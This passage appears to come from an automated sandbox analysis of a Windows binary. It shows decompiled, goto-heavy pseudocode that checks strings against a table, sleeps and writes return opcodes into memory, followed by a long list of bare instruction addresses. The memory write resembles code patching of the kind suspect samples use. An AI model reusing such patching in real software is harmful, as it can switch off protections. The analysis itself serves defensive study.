                                																															__eflags =  *_v1228 - _v5572;
                                																															if( *_v1228 >= _v5572) {
                                																																goto L183;
                                																															}
                                																															_v5820 = 0;
                                																															goto L184;
                                																														}
                                																														goto L179;
                                																													}
                                																													goto L175;
                                																												}
                                																												goto L208;
                                																											}
                                																											goto L208;
                                																										}
                                																									} else {
                                																									}
                                																									goto L209;
                                																								}
                                																								goto L111;
                                																							}
                                																							_t1513 = _v5748;
                                																							__eflags =  *((intOrPtr*)(_t1513 + 0x10)) - _v5572;
                                																							if( *((intOrPtr*)(_t1513 + 0x10)) >= _v5572) {
                                																								goto L135;
                                																							}
                                																							_v5796 = 0;
                                																							goto L136;
                                																						}
                                																					}
                                																					__eflags =  *_v5748;
                                																					if( *_v5748 != 0) {
                                																						goto L128;
                                																					}
                                																					goto L111;
                                																				}
                                																				goto L111;
                                																			}
                                																			goto L111;
                                																		}
                                																		_t1519 = _v5748;
                                																		__eflags =  *((intOrPtr*)(_t1519 + 0xc)) - _v5572;
                                																		if( *((intOrPtr*)(_t1519 + 0xc)) >= _v5572) {
                                																			goto L120;
                                																		}
                                																		_v5792 = 0;
                                																		goto L121;
                                																	}
                                																	goto L209;
                                																}
                                																goto L209;
                                															}
                                															goto L209;
                                														} else {
                                															goto L302;
                                														}
                                													}
                                												}
                                											} else {
                                												__eflags = _v80;
                                												if(_v80 != 0) {
                                													goto L80;
                                												}
                                												goto L302;
                                											}
                                										}
                                										__eflags = _v60 & 0x20000000;
                                										if((_v60 & 0x20000000) == 0) {
                                											goto L74;
                                										}
                                										_t1659 = _v60 & 0x80000000;
                                										__eflags = _v60 & 0x80000000;
                                										if((_v60 & 0x80000000) == 0) {
                                											goto L74;
                                										}
                                										goto L73;
                                									}
                                									__eflags = _v88;
                                									if(_v88 == 0) {
                                										goto L73;
                                									}
                                									goto L68;
                                								}
                                								_v5700 = 1;
                                								_v1224 = 0xc3c3c3c3;
                                								 *(_v56 + _v5716) = _v1224;
                                								 *((intOrPtr*)(_v56 + _v5716 + 4)) = _v1224;
                                								goto L302;
                                							} else {
                                								_v8 = 0xffffffff;
                                								L341:
                                								__eflags = _v32;
                                								if(_v32 != 0) {
                                									GlobalFree(_v32);
                                									_v32 = 0;
                                								}
                                								 *0x21e1180(0x2219018);
                                								__eflags = _v5700 & 0x000000ff;
                                								if((_v5700 & 0x000000ff) != 0) {
                                									Sleep(0x400); // executed
                                								}
                                								_t1207 = _v5700 & 0x000000ff;
                                								__eflags = _t1207;
                                								goto L346;
                                							}
                                						}
                                						MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v1204, 0x104);
                                						_t1591 =  *0x2219000(0,  &_v1204); // executed
                                						__eflags = _t1591;
                                						if(_t1591 == 0) {
                                							goto L14;
                                						} else {
                                							_t1207 = 0;
                                							goto L346;
                                						}
                                					} else {
                                						_v1224 = 0;
                                						while(1) {
                                							_t1592 = _v1224;
                                							__eflags =  *((char*)( *((intOrPtr*)(0x21e1c50 + _t1592 * 4))));
                                							if( *((char*)( *((intOrPtr*)(0x21e1c50 + _t1592 * 4)))) == 0) {
                                								goto L11;
                                							}
                                							_t1594 = E02208DEB(_a4,  *((intOrPtr*)(0x21e1c50 + _v1224 * 4)));
                                							_t2222 = _t2222 + 8;
                                							__eflags = _t1594;
                                							if(_t1594 == 0) {
                                								_t2197 = _v1224 + 1;
                                								__eflags = _t2197;
                                								_v1224 = _t2197;
                                								continue;
                                							} else {
                                								E0220A26E(_a4, 0);
                                								_t1207 = 0;
                                								goto L346;
                                							}
                                						}
                                						goto L11;
                                					}
                                				} else {
                                					_t1207 = 0;
                                					L346:
                                					 *[fs:0x0] = _v20;
                                					return _t1207;
                                				}
                                			}










































































































































































































































































































                                0x0220e329
                                0x0220e32c
                                0x0220e32e
                                0x0220e333
                                0x0220e33f
                                0x0220e346
                                0x0220e34e
                                0x0220e356
                                0x0220e359
                                0x0220e363
                                0x0220e36d
                                0x0220e377
                                0x0220e381
                                0x0220e38b
                                0x0220e395
                                0x0220e39f
                                0x0220e3a6
                                0x0220e3b0
                                0x0220e3ba
                                0x0220e3c4
                                0x0220e3ce
                                0x0220e3d8
                                0x0220e3df
                                0x0220e3e9
                                0x0220e3f3
                                0x0220e3fd
                                0x0220e407
                                0x0220e411
                                0x0220e418
                                0x0220e41f
                                0x0220e429
                                0x0220e433
                                0x0220e43d
                                0x0220e447
                                0x0220e45b
                                0x0220e460
                                0x0220e468
                                0x0220e468
                                0x0220e469
                                0x0220e46f
                                0x0220e479
                                0x0220e483
                                0x0220e48d
                                0x0220e494
                                0x0220e49e
                                0x0220e4a9
                                0x0220e4af
                                0x0220e4bb
                                0x0220e4c1
                                0x0220e4c4
                                0x0220e4c7
                                0x0220e4ca
                                0x0220e4d6
                                0x0220e4dc
                                0x0220e4e2
                                0x0220e4e8
                                0x0220e4ee
                                0x0220e4f7
                                0x0220e4fa
                                0x0220e4fd
                                0x0220e500
                                0x0220e503
                                0x0220e50f
                                0x0220e515
                                0x0220e51b
                                0x0220e521
                                0x0220e527
                                0x0220e533
                                0x0220e539
                                0x0220e53f
                                0x0220e545
                                0x0220e54b
                                0x0220e552
                                0x0220e560
                                0x0220e562
                                0x0220e564
                                0x0220e565
                                0x0220e56f
                                0x0220e586
                                0x0220e58e
                                0x0220e594
                                0x0220e59b
                                0x0220e5a2
                                0x0220e5ac
                                0x0220e5b8
                                0x0220e5be
                                0x0220e5ca
                                0x0220e5d0
                                0x0220e5dc
                                0x0220e5e2
                                0x0220e5e9
                                0x0220e5f0
                                0x0220e606
                                0x0220e608
                                0x0220e60a
                                0x0220e615
                                0x0220e61b
                                0x0220e621
                                0x0220e627
                                0x0220e62e
                                0x0220e642
                                0x0220e644
                                0x0220e646
                                0x0220e647
                                0x0220e651
                                0x0220e65b
                                0x0220e665
                                0x0220e66f
                                0x0220e679
                                0x0220e683
                                0x0220e68d
                                0x0220e697
                                0x0220e69c
                                0x0220e6a1
                                0x0220e6aa
                                0x0220e6ae
                                0x0220e714
                                0x0220e714
                                0x0220e71b
                                0x0220e753
                                0x0220e758
                                0x0220e75e
                                0x0220e76c
                                0x0220e773
                                0x0220e782
                                0x0220e789
                                0x0220e79d
                                0x0220e7b1
                                0x0220e7b6
                                0x0220e7c0
                                0x0220e7ca
                                0x0220e7d0
                                0x0220e7dc
                                0x0220e7e2
                                0x0220e7e4
                                0x0220e808
                                0x0220e80e
                                0x0220e814
                                0x0220e81b
                                0x0220e82c
                                0x0220e82c
                                0x0220e832
                                0x0220e839
                                0x0221088b
                                0x02210892
                                0x022108a3
                                0x022108a9
                                0x022108ad
                                0x022108b5
                                0x022108b9
                                0x022108bf
                                0x022108bf
                                0x00000000
                                0x022108bf
                                0x022108af
                                0x022108b3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022108b3
                                0x0220e83f
                                0x0220e849
                                0x00000000
                                0x00000000
                                0x0220e84f
                                0x0220e859
                                0x00000000
                                0x00000000
                                0x0220e865
                                0x0220e887
                                0x0220e8a9
                                0x0220e8af
                                0x0220e8b5
                                0x0220e8bc
                                0x022105cf
                                0x022105cf
                                0x022105d3
                                0x022107db
                                0x022107e2
                                0x022107e8
                                0x022107ef
                                0x02210807
                                0x02210814
                                0x02210826
                                0x02210829
                                0x0221082b
                                0x0221082f
                                0x0221084c
                                0x0221084c
                                0x0221082f
                                0x02210852
                                0x02210856
                                0x0221085c
                                0x02210862
                                0x02210862
                                0x02210885
                                0x02210885
                                0x00000000
                                0x022107ef
                                0x022105e5
                                0x022105e7
                                0x02210781
                                0x02210785
                                0x0221078d
                                0x0221078d
                                0x02210791
                                0x02210799
                                0x02210799
                                0x022107a2
                                0x022107ac
                                0x022107b5
                                0x022107c9
                                0x022107ce
                                0x022107d1
                                0x022107d5
                                0x00000000
                                0x022107d5
                                0x02210787
                                0x0221078b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0221078b
                                0x022105f3
                                0x022105f9
                                0x02210600
                                0x022106ee
                                0x022106ee
                                0x022106f5
                                0x0221077f
                                0x00000000
                                0x0221077f
                                0x022106fb
                                0x02210716
                                0x02210716
                                0x0221071d
                                0x00000000
                                0x00000000
                                0x0221071f
                                0x02210725
                                0x0221072d
                                0x00000000
                                0x00000000
                                0x0221072f
                                0x02210735
                                0x0221073d
                                0x0221073f
                                0x0221074c
                                0x02210752
                                0x0221076d
                                0x02210775
                                0x0221077a
                                0x0221077a
                                0x02210752
                                0x0221070d
                                0x0221070d
                                0x02210710
                                0x02210710
                                0x00000000
                                0x02210716
                                0x02210606
                                0x02210621
                                0x02210621
                                0x02210628
                                0x00000000
                                0x00000000
                                0x02210634
                                0x0221063a
                                0x02210641
                                0x00000000
                                0x00000000
                                0x0221064d
                                0x02210653
                                0x0221065a
                                0x0221066c
                                0x02210672
                                0x02210678
                                0x02210680
                                0x02210686
                                0x0221068d
                                0x022106a1
                                0x022106a3
                                0x022106b1
                                0x022106da
                                0x022106da
                                0x022106e1
                                0x022106e6
                                0x022106e6
                                0x022106a3
                                0x0221068d
                                0x02210678
                                0x02210618
                                0x02210618
                                0x0221061b
                                0x0221061b
                                0x00000000
                                0x02210621
                                0x0220e8d1
                                0x0220e8d7
                                0x0220e8da
                                0x0220e8de
                                0x00000000
                                0x00000000
                                0x0220e8ea
                                0x0220e8f6
                                0x0220e8fc
                                0x00000000
                                0x00000000
                                0x0220e902
                                0x0220e909
                                0x0220e90c
                                0x00000000
                                0x00000000
                                0x0220e921
                                0x0220e928
                                0x0220e92d
                                0x0220e930
                                0x0220e93a
                                0x00000000
                                0x00000000
                                0x0220e940
                                0x0220e947
                                0x00000000
                                0x00000000
                                0x0220e959
                                0x0220e95c
                                0x00000000
                                0x00000000
                                0x0220e962
                                0x0220e969
                                0x00000000
                                0x00000000
                                0x0220e96f
                                0x0220e976
                                0x00000000
                                0x00000000
                                0x0220e97c
                                0x0220e986
                                0x00000000
                                0x00000000
                                0x0220e98c
                                0x0220e990
                                0x0220e997
                                0x0220e99c
                                0x0220e99d
                                0x0220e9a4
                                0x0220e9a7
                                0x0220e9a9
                                0x0220e9b3
                                0x0220e9b5
                                0x0220e9bf
                                0x0220e9c7
                                0x0220e9d5
                                0x0220e9da
                                0x0220e9dd
                                0x0220e9e6
                                0x0220e9e6
                                0x0220e9e9
                                0x0220e9e9
                                0x0220e9b3
                                0x0220e9a7
                                0x0220e9fd
                                0x0220ea02
                                0x0220ea05
                                0x0220ea0b
                                0x0220ea1b
                                0x0220ea32
                                0x0220ea40
                                0x0220ea46
                                0x00000000
                                0x00000000
                                0x0220ea6e
                                0x0220ea77
                                0x0220ea7c
                                0x0220ea85
                                0x0220ea88
                                0x0220ea8d
                                0x0220ea99
                                0x0220ea99
                                0x0220eaa5
                                0x0220eaa8
                                0x0220eaad
                                0x0220eab9
                                0x0220eab9
                                0x0220eabc
                                0x0220eac0
                                0x0220eac8
                                0x00000000
                                0x0220eac2
                                0x0220eac2
                                0x0220eac6
                                0x0220ead3
                                0x0220ead6
                                0x0220eb64
                                0x0220ea23
                                0x0220ea29
                                0x0220ea29
                                0x0220ea2c
                                0x00000000
                                0x0220ea2c
                                0x0220eae2
                                0x0220eae8
                                0x00000000
                                0x00000000
                                0x0220eaf6
                                0x0220eb14
                                0x0220eb16
                                0x0220eb32
                                0x0220eb32
                                0x0220eb38
                                0x0220eb18
                                0x0220eb24
                                0x0220eb24
                                0x0220eb44
                                0x0220eb4a
                                0x0220eb51
                                0x0220eb5e
                                0x00000000
                                0x0220eb53
                                0x00000000
                                0x0220eb53
                                0x0220eb51
                                0x00000000
                                0x0220eac6
                                0x0220eac0
                                0x0220eb69
                                0x0220eb6d
                                0x0220ebb1
                                0x0220ebb7
                                0x0220ebc1
                                0x0220ebc3
                                0x0220ebc3
                                0x0220ebcd
                                0x0220ebe8
                                0x0220ebe8
                                0x0220ebef
                                0x00000000
                                0x00000000
                                0x0220ebf1
                                0x0220ebf7
                                0x0220ec01
                                0x0220ec07
                                0x0220ec09
                                0x0220ec0f
                                0x0220ec1f
                                0x0220ec25
                                0x0220ec3d
                                0x0220ec3d
                                0x0220ec40
                                0x0220ec40
                                0x0220ec25
                                0x0220ebdf
                                0x0220ebdf
                                0x0220ebe2
                                0x0220ebe2
                                0x0220ec66
                                0x0220ec6f
                                0x0220ec74
                                0x0220ec83
                                0x0220ec89
                                0x0220ecd3
                                0x00000000
                                0x0220ecd3
                                0x0220ec8b
                                0x0220ec8f
                                0x0220ec97
                                0x0220ec9f
                                0x0220eca1
                                0x00000000
                                0x00000000
                                0x0220eca3
                                0x0220eca7
                                0x00000000
                                0x00000000
                                0x0220ecac
                                0x0220ecb5
                                0x0220ecb8
                                0x0220ecd8
                                0x0220ece6
                                0x0220eceb
                                0x0220ecee
                                0x0220ecf7
                                0x0220ecfa
                                0x0220ed0a
                                0x0220ecfc
                                0x0220ecff
                                0x0220ecff
                                0x0220ed21
                                0x0220ed26
                                0x0220ed29
                                0x0220ed32
                                0x0220ed39
                                0x0220ed3f
                                0x0220ed52
                                0x0220ed58
                                0x0220ed5a
                                0x0220ed67
                                0x0220ed67
                                0x0220ed6e
                                0x0220ed7d
                                0x0220ed7d
                                0x0220ed86
                                0x0220ed8b
                                0x0220ed8b
                                0x0220ed8e
                                0x0220ed98
                                0x0220ed9f
                                0x0220edbd
                                0x0220edde
                                0x0220ede3
                                0x0220ede6
                                0x0220edf6
                                0x0220ee08
                                0x0220ee0b
                                0x0220ee0d
                                0x0220ee2b
                                0x0220ee30
                                0x0220ee3a
                                0x0220ee3a
                                0x0220ee3d
                                0x0220ee3d
                                0x0220ee0d
                                0x0220ee5a
                                0x0220ee5f
                                0x0220ee65
                                0x0220ee6b
                                0x00000000
                                0x0220ee71
                                0x0220ee77
                                0x0220ee7d
                                0x0220ee8b
                                0x0220ee91
                                0x0220ee98
                                0x0220eeaf
                                0x0220eebc
                                0x0220eec7
                                0x0220eecc
                                0x0220eecc
                                0x0220ee98
                                0x0220eed2
                                0x0220eed5
                                0x0220eee5
                                0x0220eed7
                                0x0220eeda
                                0x0220eeda
                                0x0220eef1
                                0x0220eefd
                                0x0220ef13
                                0x0220ef1f
                                0x0220ef35
                                0x0220ef40
                                0x0220ef43
                                0x0220ef4d
                                0x0220ef58
                                0x0220ef79
                                0x0220efa3
                                0x0220efce
                                0x0220efd3
                                0x0220efe9
                                0x0220efee
                                0x0220eff1
                                0x0220f009
                                0x0220f00f
                                0x0220f021
                                0x0220f023
                                0x00000000
                                0x0220f029
                                0x0220f04b
                                0x0220f054
                                0x0220f059
                                0x0220f064
                                0x0220f066
                                0x0220f075
                                0x0220f098
                                0x0220f0c5
                                0x0220f0e5
                                0x0220f0f0
                                0x0220f0f3
                                0x0220f0f8
                                0x0220f0fd
                                0x0220f0fd
                                0x0220f116
                                0x0220f11b
                                0x0220f124
                                0x0220f127
                                0x0220f13a
                                0x0220f13a
                                0x0220f140
                                0x0220f129
                                0x0220f12f
                                0x0220f12f
                                0x0220f14c
                                0x0220f160
                                0x0220f165
                                0x0220f168
                                0x0220f17a
                                0x0220f180
                                0x0220f187
                                0x0220f1a2
                                0x0220f1b1
                                0x0220f1b7
                                0x00000000
                                0x00000000
                                0x0220f1dd
                                0x0220f1e1
                                0x0220f1e7
                                0x0220f1ed
                                0x0220f1f9
                                0x0220f1fc
                                0x0220f288
                                0x0220f199
                                0x0220f199
                                0x0220f19c
                                0x00000000
                                0x0220f19c
                                0x0220f202
                                0x0220f20b
                                0x0220f214
                                0x0220f21a
                                0x0220f220
                                0x00000000
                                0x00000000
                                0x0220f222
                                0x0220f231
                                0x0220f233
                                0x0220f266
                                0x0220f26b
                                0x0220f277
                                0x0220f277
                                0x0220f283
                                0x0220f283
                                0x00000000
                                0x0220f286
                                0x0220f28d
                                0x0220f297
                                0x0220f8c0
                                0x0220f8c0
                                0x0220f8ca
                                0x0220f8e5
                                0x0220f8e5
                                0x0220f8f5
                                0x0220f8fb
                                0x0220f905
                                0x0220f920
                                0x0220f925
                                0x0220f92e
                                0x0220f92e
                                0x0220f930
                                0x0220f930
                                0x0220f93c
                                0x0220f94d
                                0x0220f953
                                0x0220f959
                                0x0220f968
                                0x0220f96e
                                0x0220f978
                                0x0220f97a
                                0x0220f981
                                0x0220f99c
                                0x0220f9a1
                                0x0220f9aa
                                0x0220f9aa
                                0x0220f9ac
                                0x0220f9ac
                                0x0220f981
                                0x0220f9c7
                                0x0220f9ce
                                0x0220f9d8
                                0x0220f9f3
                                0x0220f9f8
                                0x0220fa01
                                0x0220fa01
                                0x0220fa03
                                0x0220fa03
                                0x0220fa09
                                0x0220fa13
                                0x0220fa14
                                0x0220fa19
                                0x0220fa19
                                0x0220fa1b
                                0x0220fa27
                                0x0220fa2d
                                0x0220fa33
                                0x0220fa39
                                0x00000000
                                0x00000000
                                0x0220fa3b
                                0x0220fa45
                                0x0220fa46
                                0x0220fa4d
                                0x0220fa4d
                                0x0220fa67
                                0x0220fa77
                                0x0220fa7d
                                0x0220fa87
                                0x0220fa8f
                                0x0220fa95
                                0x0220fa9f
                                0x0220faa1
                                0x0220faa8
                                0x0220fad0
                                0x0220fad5
                                0x0220fade
                                0x0220fade
                                0x0220fae0
                                0x0220fae0
                                0x0220faa8
                                0x0220fb07
                                0x0220fb0c
                                0x0220fb17
                                0x0220fb1d
                                0x0220fb27
                                0x0220fb29
                                0x0220fb30
                                0x0220fb4b
                                0x0220fb50
                                0x0220fb59
                                0x0220fb59
                                0x0220fb5b
                                0x0220fb5b
                                0x0220fb30
                                0x0220fb82
                                0x0220fb87
                                0x0220fb92
                                0x0220fb98
                                0x0220fb9c
                                0x0220fc1d
                                0x0220fc28
                                0x0220fc2d
                                0x0220fc36
                                0x0220fc36
                                0x0220fc38
                                0x0220fb9e
                                0x0220fbc3
                                0x0220fbcc
                                0x0220fbd1
                                0x0220fbdc
                                0x0220fbdc
                                0x0220fc3e
                                0x0220fc48
                                0x0220fc4a
                                0x0220fc51
                                0x0220fc79
                                0x0220fc7e
                                0x0220fc87
                                0x0220fc87
                                0x0220fc89
                                0x0220fc89
                                0x0220fc51
                                0x0220fc94
                                0x0220fc99
                                0x0220fca1
                                0x0220fca4
                                0x0220fd8c
                                0x0220fd92
                                0x0220fda3
                                0x0220fdbb
                                0x0220fdc8
                                0x0220fdc8
                                0x0220fdcb
                                0x00000000
                                0x0220fcaa
                                0x0220fcaa
                                0x0220fcb1
                                0x00000000
                                0x00000000
                                0x0220fcc9
                                0x0220fcd9
                                0x0220fcdf
                                0x0220fce9
                                0x0220fceb
                                0x0220fcf2
                                0x0220fd1a
                                0x0220fd1f
                                0x0220fd28
                                0x0220fd28
                                0x0220fd2a
                                0x0220fd2a
                                0x0220fcf2
                                0x0220fd57
                                0x0220fd5c
                                0x0220fd67
                                0x0220fd73
                                0x0220fd84
                                0x0220fdd1
                                0x0220fdd7
                                0x0220fddd
                                0x0220fde1
                                0x0220fde1
                                0x0220fde8
                                0x0220f8dc
                                0x0220f8dc
                                0x0220f8df
                                0x00000000
                                0x0220f8df
                                0x00000000
                                0x0220fdea
                                0x0220fdfa
                                0x0220fe1d
                                0x0220fe58
                                0x0220fe5e
                                0x0220fe63
                                0x0220fe6b
                                0x0220fe6e
                                0x0220fe75
                                0x0220fe7c
                                0x0220fe83
                                0x0220fe90
                                0x0220fe96
                                0x0220fea3
                                0x0220fea8
                                0x0220feb8
                                0x0220febe
                                0x0220fed9
                                0x0220fede
                                0x0220fee4
                                0x0220fee8
                                0x0220fefc
                                0x0220feea
                                0x0220feea
                                0x0220feea
                                0x0220ff02
                                0x0220ff0e
                                0x0220ff25
                                0x0220ff30
                                0x0220ff55
                                0x0220ff75
                                0x0220ff7a
                                0x0220ff7d
                                0x0220ff8d
                                0x0220ffa4
                                0x0220ffaa
                                0x0220ffb0
                                0x0220ffb7
                                0x00000000
                                0x00000000
                                0x0220ffcb
                                0x0220ffd1
                                0x0220ff9b
                                0x0220ff9b
                                0x0220ff9e
                                0x0220ff9e
                                0x0220ffd9
                                0x02210003
                                0x02210003
                                0x02210009
                                0x02210011
                                0x00000000
                                0x00000000
                                0x0220ffee
                                0x0220fffa
                                0x0220fffa
                                0x0220fffd
                                0x0220fffd
                                0x02210015
                                0x0221001f
                                0x02210026
                                0x0221002b
                                0x02210032
                                0x02210039
                                0x02210040
                                0x02210047
                                0x02210058
                                0x02210065
                                0x0221006a
                                0x0221006d
                                0x02210077
                                0x02210089
                                0x02210094
                                0x0221009a
                                0x022100aa
                                0x022100c1
                                0x022100c1
                                0x022100c8
                                0x00000000
                                0x00000000
                                0x022100ce
                                0x022100db
                                0x022100e1
                                0x022100e8
                                0x02210129
                                0x02210129
                                0x0221012d
                                0x0221017e
                                0x022100b8
                                0x022100b8
                                0x022100bb
                                0x00000000
                                0x022100bb
                                0x0221012f
                                0x02210159
                                0x02210159
                                0x02210160
                                0x00000000
                                0x00000000
                                0x02210162
                                0x0221017a
                                0x02210144
                                0x02210150
                                0x02210150
                                0x02210153
                                0x02210153
                                0x00000000
                                0x02210159
                                0x022100f0
                                0x00000000
                                0x022100fd
                                0x00000000
                                0x00000000
                                0x02210102
                                0x02210108
                                0x00000000
                                0x00000000
                                0x02210113
                                0x00000000
                                0x00000000
                                0x02210118
                                0x0221011b
                                0x00000000
                                0x00000000
                                0x02210120
                                0x02210126
                                0x00000000
                                0x00000000
                                0x022100f0
                                0x02210183
                                0x0221018d
                                0x02210193
                                0x022101ab
                                0x022101b0
                                0x022101c5
                                0x022101d0
                                0x022101e8
                                0x022101f3
                                0x0221020b
                                0x02210213
                                0x02210216
                                0x0221021c
                                0x02210237
                                0x0221023d
                                0x02210243
                                0x0221024a
                                0x00000000
                                0x00000000
                                0x02210250
                                0x02210257
                                0x00000000
                                0x00000000
                                0x02210275
                                0x0221027b
                                0x02210286
                                0x02210298
                                0x022102ad
                                0x022102b8
                                0x022102ca
                                0x022102f1
                                0x022102f6
                                0x022102ff
                                0x02210311
                                0x0221022e
                                0x0221022e
                                0x02210231
                                0x02210231
                                0x02210325
                                0x0221032b
                                0x02210346
                                0x0221034c
                                0x02210354
                                0x00000000
                                0x00000000
                                0x02210356
                                0x0221035d
                                0x00000000
                                0x00000000
                                0x02210378
                                0x02210383
                                0x022103a2
                                0x022103ad
                                0x0221033d
                                0x0221033d
                                0x02210340
                                0x02210340
                                0x022103bb
                                0x022103c2
                                0x022103c7
                                0x022103ca
                                0x022103d0
                                0x022103d7
                                0x022103d9
                                0x022103e3
                                0x022103e5
                                0x022103ef
                                0x022103fb
                                0x02210402
                                0x02210408
                                0x0221040f
                                0x02210414
                                0x02210414
                                0x022103ef
                                0x022103e3
                                0x02210432
                                0x0221043f
                                0x0221044c
                                0x02210451
                                0x0221045a
                                0x0221045d
                                0x02210470
                                0x0221045f
                                0x02210465
                                0x02210465
                                0x02210480
                                0x02210489
                                0x02210490
                                0x02210495
                                0x0221049e
                                0x022104a1
                                0x022104b1
                                0x022104b4
                                0x022104a3
                                0x022104a9
                                0x022104a9
                                0x022104c6
                                0x022104e2
                                0x022104e8
                                0x022104f2
                                0x02210504
                                0x0221050a
                                0x02210514
                                0x022105c8
                                0x022105c8
                                0x00000000
                                0x0221051a
                                0x0221051a
                                0x02210524
                                0x02210533
                                0x0221053c
                                0x02210542
                                0x022105a7
                                0x022105ad
                                0x022105b3
                                0x00000000
                                0x00000000
                                0x022105be
                                0x022105c4
                                0x02210557
                                0x02210566
                                0x02210579
                                0x02210583
                                0x0221059f
                                0x0221059f
                                0x022105a1
                                0x022105a1
                                0x00000000
                                0x022105a7
                                0x02210514
                                0x00000000
                                0x0220fe77
                                0x00000000
                                0x0220fe75
                                0x0220fca4
                                0x0220f8e5
                                0x0220f2b1
                                0x0220f2b6
                                0x0220f2be
                                0x0220f2c4
                                0x0220f2ee
                                0x0220f2ee
                                0x0220f2ee
                                0x0220f2fa
                                0x0220f300
                                0x00000000
                                0x00000000
                                0x0220f30f
                                0x0220f315
                                0x0220f317
                                0x0220f31e
                                0x0220f324
                                0x0220f328
                                0x0220f32f
                                0x0220f335
                                0x0220f339
                                0x0220f358
                                0x0220f358
                                0x0220f362
                                0x0220f362
                                0x0220f369
                                0x0220f370
                                0x0220f376
                                0x0220f37a
                                0x0220f381
                                0x0220f387
                                0x0220f38b
                                0x0220f39d
                                0x0220f39d
                                0x0220f3a3
                                0x0220f3a7
                                0x0220f3a9
                                0x0220f3af
                                0x0220f3b3
                                0x0220f3d3
                                0x0220f3e1
                                0x0220f3eb
                                0x0220f3f0
                                0x0220f3f9
                                0x0220f3f9
                                0x0220f3b3
                                0x0220f400
                                0x0220f406
                                0x0220f40a
                                0x0220f455
                                0x0220f458
                                0x0220f476
                                0x0220f476
                                0x0220f480
                                0x0220f480
                                0x0220f487
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0220f489
                                0x0220f462
                                0x0220f468
                                0x00000000
                                0x00000000
                                0x0220f46a
                                0x00000000
                                0x0220f40c
                                0x0220f40c
                                0x0220f412
                                0x0220f416
                                0x0220f435
                                0x0220f435
                                0x0220f43f
                                0x0220f43f
                                0x0220f446
                                0x0220f48e
                                0x0220f48e
                                0x0220f494
                                0x0220f498
                                0x0220f4b3
                                0x0220f49a
                                0x0220f4a3
                                0x0220f4a3
                                0x0220f4c9
                                0x0220f4ce
                                0x0220f4d7
                                0x0220f4dd
                                0x0220f4df
                                0x0220f52f
                                0x0220f4e1
                                0x0220f4e1
                                0x0220f4e7
                                0x0220f4eb
                                0x0220f506
                                0x0220f4ed
                                0x0220f4f6
                                0x0220f4f6
                                0x0220f51a
                                0x0220f51f
                                0x0220f527
                                0x0220f527
                                0x0220f539
                                0x0220f53f
                                0x0220f543
                                0x0220f55e
                                0x0220f545
                                0x0220f54e
                                0x0220f54e
                                0x0220f574
                                0x0220f579
                                0x0220f582
                                0x0220f588
                                0x0220f58a
                                0x0220f5da
                                0x0220f58c
                                0x0220f58c
                                0x0220f592
                                0x0220f596
                                0x0220f5b1
                                0x0220f598
                                0x0220f5a1
                                0x0220f5a1
                                0x0220f5c5
                                0x0220f5ca
                                0x0220f5d2
                                0x0220f5d2
                                0x0220f5ed
                                0x0220f5f3
                                0x0220f5f5
                                0x0220f605
                                0x0220f60b
                                0x0220f60d
                                0x0220f634
                                0x0220f63d
                                0x0220f643
                                0x0220f645
                                0x00000000
                                0x00000000
                                0x0220f655
                                0x0220f65b
                                0x0220f65d
                                0x0220f671
                                0x0220f673
                                0x0220f687
                                0x0220f616
                                0x0220f61f
                                0x0220f62b
                                0x0220f62b
                                0x0220f62e
                                0x00000000
                                0x0220f62e
                                0x0220f683
                                0x0220f685
                                0x0220f68f
                                0x0220f692
                                0x0220f6aa
                                0x0220f8bb
                                0x0220f2d0
                                0x0220f2d9
                                0x0220f2e5
                                0x0220f2e5
                                0x0220f2e8
                                0x00000000
                                0x0220f2e8
                                0x0220f69a
                                0x0220f69d
                                0x00000000
                                0x00000000
                                0x0220f6a5
                                0x0220f6a8
                                0x0220f6b5
                                0x0220f6b8
                                0x0220f6d6
                                0x0220f6d6
                                0x0220f6e0
                                0x0220f6e0
                                0x0220f6e7
                                0x0220f700
                                0x0220f705
                                0x0220f70e
                                0x0220f714
                                0x0220f716
                                0x0220f73d
                                0x00000000
                                0x0220f73d
                                0x0220f728
                                0x0220f72d
                                0x0220f735
                                0x0220f74e
                                0x0220f754
                                0x0220f756
                                0x0220f766
                                0x0220f768
                                0x0220f789
                                0x0220f79b
                                0x0220f7a1
                                0x0220f7a3
                                0x0220f7a5
                                0x0220f7ac
                                0x0220f7b7
                                0x0220f7c4
                                0x0220f7c4
                                0x0220f7c7
                                0x0220f7c7
                                0x0220f7ac
                                0x0220f7dc
                                0x0220f7e2
                                0x0220f7e4
                                0x0220f7e6
                                0x0220f7ea
                                0x0220f7f2
                                0x0220f7fc
                                0x0220f7fc
                                0x0220f7ff
                                0x0220f7ff
                                0x0220f7ea
                                0x0220f811
                                0x0220f817
                                0x0220f819
                                0x0220f81b
                                0x0220f81f
                                0x0220f827
                                0x0220f82e
                                0x0220f82e
                                0x0220f831
                                0x0220f831
                                0x0220f81f
                                0x0220f843
                                0x0220f849
                                0x0220f84b
                                0x0220f84d
                                0x0220f854
                                0x0220f85f
                                0x0220f86c
                                0x0220f86c
                                0x0220f86f
                                0x0220f86f
                                0x0220f854
                                0x0220f884
                                0x0220f88a
                                0x0220f88c
                                0x0220f88e
                                0x0220f895
                                0x0220f8a0
                                0x0220f8ad
                                0x0220f8ad
                                0x0220f8b0
                                0x0220f8b0
                                0x0220f895
                                0x0220f88c
                                0x00000000
                                0x0220f758
                                0x00000000
                                0x0220f758
                                0x00000000
                                0x0220f756
                                0x00000000
                                0x0220f6e9
                                0x0220f6c2
                                0x0220f6c8
                                0x00000000
                                0x00000000
                                0x0220f6ca
                                0x00000000
                                0x0220f6ca
                                0x00000000
                                0x0220f6a8
                                0x00000000
                                0x0220f685
                                0x00000000
                                0x0220f65f
                                0x00000000
                                0x0220f647
                                0x00000000
                                0x0220f5f7
                                0x00000000
                                0x0220f5f5
                                0x00000000
                                0x0220f448
                                0x0220f418
                                0x0220f421
                                0x0220f427
                                0x00000000
                                0x00000000
                                0x0220f429
                                0x00000000
                                0x0220f429
                                0x0220f40a
                                0x0220f393
                                0x0220f396
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0220f398
                                0x00000000
                                0x0220f37c
                                0x00000000
                                0x0220f36b
                                0x0220f33b
                                0x0220f344
                                0x0220f34a
                                0x00000000
                                0x00000000
                                0x0220f34c
                                0x00000000
                                0x0220f34c
                                0x00000000
                                0x0220f32a
                                0x00000000
                                0x0220f319
                                0x00000000
                                0x0220f182
                                0x00000000
                                0x0220f182
                                0x0220f180
                                0x0220f023
